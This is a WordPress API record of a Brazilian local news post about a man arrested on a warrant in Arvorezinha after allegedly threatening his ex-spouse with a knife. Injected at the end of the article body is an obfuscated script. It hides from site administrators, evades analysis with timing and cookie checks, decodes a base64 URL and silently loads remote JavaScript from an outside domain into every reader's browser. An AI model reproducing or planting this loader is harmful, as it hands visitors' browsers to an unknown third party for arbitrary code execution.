{"id":3480,"date":"2021-03-07T01:19:31","date_gmt":"2021-03-07T01:19:31","guid":{"rendered":"https:\/\/www.jornalnotiserra.com.br\/?p=3480"},"modified":"2026-04-04T18:15:36","modified_gmt":"2026-04-04T18:15:36","slug":"individuo-e-preso-em-cumprimento-de-mandado","status":"publish","type":"post","link":"https:\/\/www.jornalnotiserra.com.br\/index.php\/2021\/03\/07\/individuo-e-preso-em-cumprimento-de-mandado\/","title":{"rendered":"Indiv\u00edduo \u00e9 preso em cumprimento de Mandado"},"content":{"rendered":"<p>Na tarde deste s\u00e1bado, 06 de mar\u00e7o de 2021, policiais militares do 22\u00b0 Batalh\u00e3o de Pol\u00edcia Militar (22\u00b0BPM) que atuam na cidade de Arvorezinha, efetuaram a pris\u00e3o de um indiv\u00edduo de 39 anos que encontrava-se com mandado de pris\u00e3o em seu desfavor em Linha S\u00e3o Louren\u00e7o, interior de Arvorezinha.<\/p>\n<p>A guarni\u00e7\u00e3o de servi\u00e7o foi informada por equipe da pol\u00edcia civil de que havia um indiv\u00edduo com mandado de pris\u00e3o em seu desfavor, e que este estava descumprindo ordem judicial de medidas protetivas com amea\u00e7as de morte, foi encontrado o acusado com uma faca na tentativa de agredir sua ex conjugue, o mesmo foi abordado e diante dos fatos foi dado voz de pris\u00e3o ao mesmo, o qual foi conduzido a DPPA de Soledade.<\/p>\n<p>O indiv\u00edduo possui antecedentes por roubo,furto, recepta\u00e7\u00e3o e abigeato.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Na tarde deste s\u00e1bado, 06 de mar\u00e7o de 2021, policiais militares do 22\u00b0 Batalh\u00e3o de Pol\u00edcia Militar (22\u00b0BPM) que atuam na cidade de Arvorezinha, efetuaram a pris\u00e3o de um indiv\u00edduo de 39 anos que encontrava-se com mandado de pris\u00e3o em seu desfavor em Linha S\u00e3o Louren\u00e7o, interior de Arvorezinha. A guarni\u00e7\u00e3o de servi\u00e7o foi informada&#8230;<\/p>\n","protected":false},"author":7,"featured_media":3481,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[45],"tags":[],"_links":{"self":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3480"}],"collection":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=3480"}],"version-history":[{"count":1,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3480\/revisions"}],"predecessor-version":[{"id":3482,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3480\/revisions\/3482"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media\/3481"}],"wp:attachment":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=3480"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=3480"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=3480"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}